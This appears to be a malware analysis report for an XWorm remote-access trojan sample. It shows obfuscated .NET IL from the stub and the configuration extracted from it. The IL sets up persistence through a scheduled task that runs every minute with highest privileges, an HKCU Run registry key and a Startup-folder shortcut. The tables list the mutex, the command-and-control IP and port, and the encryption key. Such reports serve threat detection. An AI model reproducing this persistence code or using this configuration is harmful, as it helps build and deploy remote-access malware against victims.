LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::zcGICJyukyq1HbLDChLbLh call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::zcGICJyukyq1HbLDChLbLh ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::GNuXqxC6LDICNFpoy1KEkc call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::GNuXqxC6LDICNFpoy1KEkc ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::2VbJ8P5ce3y4N6QhDBnrsY call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::2VbJ8P5ce3y4N6QhDBnrsY ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::eeRbwjU3QLNOleqA7MXXq1 call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::eeRbwjU3QLNOleqA7MXXq1 ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::LNVmzkrruJFAbQzFlL4KIz call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::LNVmzkrruJFAbQzFlL4KIz leave.s IL_012F: call System.Boolean Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::bAWzUeMeCInOtpqTer6eCwtFvhuyI1XHl4ZAHdeLKnBwvLe1SNtsEI5nZBsOFsY9Z4ieoJtF() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_012F: call System.Boolean Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::bAWzUeMeCInOtpqTer6eCwtFvhuyI1XHl4ZAHdeLKnBwvLe1SNtsEI5nZBsOFsY9Z4ieoJtF() call System.Boolean Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::bAWzUeMeCInOtpqTer6eCwtFvhuyI1XHl4ZAHdeLKnBwvLe1SNtsEI5nZBsOFsY9Z4ieoJtF() brtrue.s IL_013C: call System.Void Stub.UvCI8MLofEi6lFXnao8uGd::XoM7BrSvlMF6dHv8nDRqWl() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.UvCI8MLofEi6lFXnao8uGd::XoM7BrSvlMF6dHv8nDRqWl() ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::UrsNfRfXqIy09mJVXjkllP ldstr \ ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0183: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_019A: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::wEvF0rjYalZyUoCzZAMG5BoHjxEUGztF9VYVZeoPSL0csr2mzYPuxliw58nQaw7o7uQWoNgf call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_01C5: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01C5: ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_8 ldloc.s V_8 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.V3yVU3SxD6hqTxjz9xIv7h::9EvvLFqGP7DiNDDps1wthCPj9FVGShzlFlnCtjxF8yCXt6SSCcmzgg() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_022B: ldloc.s V_8 ldloc.s V_8 ldc.i4.5 <null> newarr System.String stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_13 ldc.i4.1 <null> ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_13 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_13 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_13 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_13 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_026F: ldloc.s V_8 ldloc.s V_8 ldc.i4.5 <null> newarr System.String stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_13 ldc.i4.1 <null> ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_13 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_13 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_13 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_13 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_8 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_7 ldloc.s V_7 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_0290: call My.KKeontSr3KPlfTen8Cb28A My.f7jGy1NxKAXFWX0lw7IUMP::kD11LkYbs4RukCEFQ4BIBV() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0290: call My.KKeontSr3KPlfTen8Cb28A My.f7jGy1NxKAXFWX0lw7IUMP::kD11LkYbs4RukCEFQ4BIBV() call My.KKeontSr3KPlfTen8Cb28A My.f7jGy1NxKAXFWX0lw7IUMP::kD11LkYbs4RukCEFQ4BIBV() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_02CB: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02CB: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_11 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldloc.s V_11 stelem.ref <null> ldloc.s V_14 stloc.s V_15 ldloc.s V_15 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_16 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_16 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0350: stloc.s V_17 ldloc.s V_15 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_11 stloc.s V_17 ldloc.s V_17 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_18 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_17 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_18 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_17 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_17 ldloc.s V_11 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::6TH2vcTvxY73QHiAIaGbsIw8BZDaxi8PTrt9QZAsUqvR3JpU2FARLWmU2QMYfqj9nxuMtuq9 leave.s IL_03CF: call System.Void Stub.uqdLVcuuUiIGluTNmT19TA18joYjriddm8ztLxRJ2lq6spSQfyqxL2UDESBYyagDRWKw4nr98kory5Sf9L8vHXm::MHFNxvTbPabMTJVhovkrRu5k4YTb5bJF312AfdcMmWkULJaYgtJT3lK5LnBweoKDDh8qgtegc31HWZJY3ZxSVIM() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_03CF: call System.Void Stub.uqdLVcuuUiIGluTNmT19TA18joYjriddm8ztLxRJ2lq6spSQfyqxL2UDESBYyagDRWKw4nr98kory5Sf9L8vHXm::MHFNxvTbPabMTJVhovkrRu5k4YTb5bJF312AfdcMmWkULJaYgtJT3lK5LnBweoKDDh8qgtegc31HWZJY3ZxSVIM() call System.Void Stub.uqdLVcuuUiIGluTNmT19TA18joYjriddm8ztLxRJ2lq6spSQfyqxL2UDESBYyagDRWKw4nr98kory5Sf9L8vHXm::MHFNxvTbPabMTJVhovkrRu5k4YTb5bJF312AfdcMmWkULJaYgtJT3lK5LnBweoKDDh8qgtegc31HWZJY3ZxSVIM() call System.Void Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::UUcwDLY6yIP4iPo8wp5fGocbs76hDwTK9VlYrPLrzsJdLNA8d8gtd84IxI37tBVeJEhkSt4C() ldnull <null> ldftn System.Void Stub.UvCI8MLofEi6lFXnao8uGd::ebcEBkIBptq6wEJZoTd5kU() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.UvCI8MLofEi6lFXnao8uGd::08PSPkLdKhSUcCPkzpaaLX() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.V3yVU3SxD6hqTxjz9xIv7h::9EvvLFqGP7DiNDDps1wthCPj9FVGShzlFlnCtjxF8yCXt6SSCcmzgg() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0416: call System.Void Stub.UvCI8MLofEi6lFXnao8uGd::qnV11KZkRfqEc867kJ8juY() call System.Void Stub.2Gl6ySuN5jETPiDdlPiwqtYhTB0v7hjdQ0f1xiA7mNxBEMbXTAu46Z10vG2d1vcgE1kXD5Ol::lRN1LYz53iYBN05Dh2x12NsqcNPlWspSkdnjKsXA8u2QRCOPF3CtATg49qS1nyHvMOlVj2MM() call System.Void Stub.UvCI8MLofEi6lFXnao8uGd::qnV11KZkRfqEc867kJ8juY() ldnull <null> ldftn System.Void Stub.UvCI8MLofEi6lFXnao8uGd::PBd6jyr7nfSryk01sBdkBV() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.UvCI8MLofEi6lFXnao8uGd::1U5pG2qRV2l1XUYnx0uQh1() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
|
Name0 | Value |
|---|---|
| Mutex | 35JqrAaohVlAJCkY |
| CnC | 45.74.19.28 |
| Port | 443 |
|
Config. Field0 | Value |
|---|---|
| Mutex | 35JqrAaohVlAJCkY |
| Hosts | 45.74.19.28 |
| Port | 443 |
| KEY | craxsrat |
| USBNM | <Xwormmm> |
| LoggerPath | %ProgramData% |
| family | xworm |
|
Name0 | Value | Location |
|---|---|---|
| Mutex | 35JqrAaohVlAJCkY Malicious |
00ca5f39ac3e10bacd20be2ac1747395 |
| CnC | 45.74.19.28 Malicious |
00ca5f39ac3e10bacd20be2ac1747395 |
| Port | 443 Malicious |
00ca5f39ac3e10bacd20be2ac1747395 |